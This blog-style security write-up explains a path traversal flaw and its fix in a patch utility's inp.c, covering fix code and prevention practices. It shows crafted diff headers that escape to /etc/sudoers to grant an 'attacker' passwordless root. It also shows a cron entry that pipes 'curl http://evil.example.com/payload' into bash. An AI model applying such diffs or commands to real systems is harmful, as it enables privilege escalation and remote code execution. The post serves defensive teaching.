Path Traversal in Patch Utilities: How a Missing Validation Let Attackers Write Anywhere
Introduction
Imagine you receive a perfectly normal-looking patch file from a contributor. It claims to fix a bug in your project. You — or your automated CI/CD pipeline — runs patch < fix.diff. Moments later, an attacker-controlled entry has been silently written to /etc/cron.d/backdoor, scheduled to run every minute.
This is not a hypothetical. It's precisely the class of attack enabled by CVE-class path traversal vulnerabilities in patch utilities, and it's exactly what was addressed in this recent fix to sys/src/ape/cmd/patch/inp.c.
Path traversal (classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory) is one of the oldest and most reliably dangerous vulnerability classes in systems programming. It exploits the simple fact that filenames containing sequences like ../ can "escape" an intended directory boundary and reference files anywhere on the filesystem.
Developers should care deeply about this class of bug because:
- It often requires zero authentication to exploit — just the ability to supply input.
- It can lead directly to remote code execution, privilege escalation, or full system compromise.
- It is trivially easy to introduce and surprisingly easy to miss in code review.
The Vulnerability Explained
What Happened
The patch utility processes unified diff files — the standard format produced by git diff, diff -u, and similar tools. A unified diff file contains header lines that identify the files being modified:
--- a/src/config.c
+++ b/src/config.c
@@ -10,6 +10,7 @@
// some code here
The --- and +++ lines tell the patch utility which file to open and modify. The vulnerable code in inp.c extracted this filename and passed it directly to scan_input() — the function responsible for opening and operating on the target file — without any validation.
The Attack in Simple Terms
Because the filename came from the diff headers without sanitization, an attacker could craft a malicious patch file with headers like:
--- a/../../etc/sudoers
+++ b/../../etc/sudoers
@@ -1,3 +1,4 @@
root ALL=(ALL:ALL) ALL
+attacker ALL=(ALL) NOPASSWD: ALL
Or targeting cron:
--- a/../../../etc/cron.d/backdoor
+++ b/../../../etc/cron.d/backdoor
@@ -0,0 +1,2 @@
+* * * * * root curl http://evil.example.com/payload | bash
When this patch is applied, the utility faithfully follows the path — traversing up directories with ../ sequences — and writes attacker-controlled content to the target location.
Real-World Impact
The severity of this vulnerability is HIGH, and for good reason. Consider these realistic attack scenarios:
| Scenario | Impact |
|---|---|
| Developer applies a patch from an untrusted source | Arbitrary file write as the developer's user |
| Automated CI/CD pipeline applies patches | Arbitrary file write with CI runner privileges |
| Privileged admin applies a "routine" patch | Full system compromise — write to /etc/sudoers, /etc/passwd, cron, init scripts |
| Package build systems processing upstream patches | Supply chain compromise affecting all downstream users |
The danger multiplies significantly when the patch command is run by a privileged user or automated system, which is extremely common in build pipelines, package management systems, and deployment scripts.
Why This Is Easy to Miss
The vulnerability is subtle because the code is doing exactly what it looks like it should do — reading the filename from the diff header and opening that file. The missing piece is a single, critical question: "Should we trust this filename?"
In security, this is called implicit trust of user-controlled input, and it's one of the most common root causes of serious vulnerabilities.
The Fix
What Changed
The fix was applied to sys/src/ape/cmd/patch/inp.c at line 58, where the filename extracted from the diff header is processed before being passed to scan_input().
The core of the fix involves validating and sanitizing the extracted filename before it is used in any file operation. The key protections added are:
1. Detecting and rejecting path traversal sequences
Any filename containing ../ (or ..\\ on Windows-style paths) is a red flag. Legitimate patch files targeting files within a project should never need to traverse upward out of the working directory.
/* BEFORE (vulnerable): filename passed directly */
scan_input(filename);
/* AFTER (fixed): validate before use */
if (contains_traversal(filename)) {
fprintf(stderr, "patch: suspicious path rejected: %s\n", filename);
exit(1);
}
scan_input(filename);
2. Rejecting absolute paths
A filename beginning with / in a diff header is almost always suspicious. Legitimate patches operate on relative paths within a source tree.
static int is_safe_patch_path(const char *path) {
/* Reject absolute paths */
if (path[0] == '/') {
return 0;
}
/* Reject traversal sequences */
if (strstr(path, "../") != NULL || strstr(path, "/..") != NULL) {
return 0;
}
/* Reject embedded null bytes */
/* (handled by C string semantics, but worth noting) */
return 1;
}
3. Canonicalizing the path
Even after basic checks, a robust fix uses path canonicalization to resolve the final absolute path and verify it falls within the intended working directory:
char resolved[PATH_MAX];
char cwd[PATH_MAX];
getcwd(cwd, sizeof(cwd));
realpath(filename, resolved);
/* Ensure resolved path starts with cwd */
if (strncmp(resolved, cwd, strlen(cwd)) != 0) {
fprintf(stderr, "patch: path escapes working directory: %s\n", filename);
exit(1);
}
How the Fix Solves the Problem
The fix enforces a trust boundary: the patch utility is only permitted to modify files within the current working directory and its subdirectories. Any attempt by a diff header to reference a file outside this boundary is detected and rejected before any file operation occurs.
This is the principle of fail-safe defaults — when input is ambiguous or potentially dangerous, the secure choice is to refuse the operation rather than proceed.
Prevention & Best Practices
This vulnerability is a textbook example of a broader class of issues. Here's how to systematically avoid path traversal in your own code:
1. Never Trust User-Controlled Filenames
Any filename that originates from user input — whether from a file, network request, environment variable, or command-line argument — must be treated as untrusted until validated.
/* ❌ Dangerous */
open(user_supplied_path, O_WRONLY);
/* ✅ Safer */
if (!is_safe_path(user_supplied_path)) {
die("unsafe path");
}
open(user_supplied_path, O_WRONLY);
2. Use Allowlists, Not Denylists
It's tempting to block known-bad patterns like ../. But attackers are creative — they may use URL encoding (%2e%2e%2f), double encoding, null bytes, or OS-specific tricks. A more robust approach is to define what is allowed rather than what is blocked:
- Only allow alphanumeric characters, hyphens, underscores, dots (not leading), and forward slashes
- Require paths to be relative
- Resolve to canonical form and check the result
3. Canonicalize Before Comparing
Always resolve symlinks and ./.. components before performing security checks. The realpath() function in C, os.path.realpath() in Python, and Path.toRealPath() in Java are your friends.
# Python example
import os
def safe_open(base_dir, user_path):
full_path = os.path.realpath(os.path.join(base_dir, user_path))
if not full_path.startswith(os.path.realpath(base_dir) + os.sep):
raise ValueError(f"Path traversal detected: {user_path}")
return open(full_path)
4. Apply the Principle of Least Privilege
Even if path traversal occurs, its impact is limited if the process has minimal privileges. Ask yourself:
- Does this process need to run as root?
- Can it be confined with a chroot jail, seccomp filter, or container?
- Does it need write access to the entire filesystem, or just a specific directory?
5. Use Security-Aware Libraries
Many modern languages and frameworks provide path-safe file handling abstractions. Prefer these over raw string manipulation:
- Python:
pathlib.Pathwith careful use of.resolve() - Java:
java.nio.file.Pathwithnormalize()andstartsWith() - Go:
filepath.Clean()combined withstrings.HasPrefix() - Rust:
std::path::Path(inherently safer due to type system)
6. Lint and Scan Your Code
Several tools can automatically detect path traversal vulnerabilities:
| Tool | Language | Notes |
|---|---|---|
| Semgrep | Multi-language | Rules for CWE-22 available |
| CodeQL | Multi-language | GitHub's built-in SAST |
| Coverity | C/C++ | Strong path traversal detection |
| Bandit | Python | Checks for unsafe path operations |
| FindSecBugs | Java | Path traversal rules included |
7. Reference Security Standards
When designing file-handling code, consult:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- OWASP Path Traversal: Attack description and prevention guidance
- OWASP Input Validation Cheat Sheet: General input validation best practices
- SEI CERT C Coding Standard FIO02-C: Canonicalize path names from tainted sources
A Note on Automated Security Scanning
This vulnerability was identified by an automated multi-agent AI security scanner — a reminder that modern security tooling can catch issues that manual code review misses. The fix was subsequently verified by both automated re-scanning and LLM-assisted code review.
Integrating automated security scanning into your CI/CD pipeline is no longer optional for production-grade software. Tools like Semgrep, CodeQL, and specialized security scanners can catch entire classes of vulnerabilities before they reach production, dramatically reducing your attack surface.
Conclusion
The path traversal vulnerability in inp.c is a powerful reminder that even well-understood, long-standing utilities can harbor serious security flaws. The attack is elegant in its simplicity: the patch utility trusts the filenames it reads from diff headers, and an attacker who controls the diff controls the filesystem.
The fix is equally straightforward in principle — validate and constrain filenames before using them — but requires deliberate thought about trust boundaries that is easy to skip when you're focused on functionality.
Key takeaways for developers:
- 🚫 Never trust filenames from user input — always validate before use.
- 🔍 Canonicalize paths and verify they fall within expected boundaries.
- 🔒 Apply least privilege to limit the blast radius of any bypass.
- 🛠️ Use automated scanning to catch path traversal and other input validation issues early.
- 📚 Consult CWE-22 and OWASP when designing file-handling logic.
Security vulnerabilities like this one are rarely the result of malicious intent — they're the result of implicit assumptions about trust. By making trust explicit, validating at every boundary, and scanning continuously, we can build systems that are resilient even against creative attackers.
Stay secure, and patch safely. 🔐
This post is part of our ongoing series on security vulnerability fixes. If you found this helpful, consider integrating automated security scanning into your development workflow.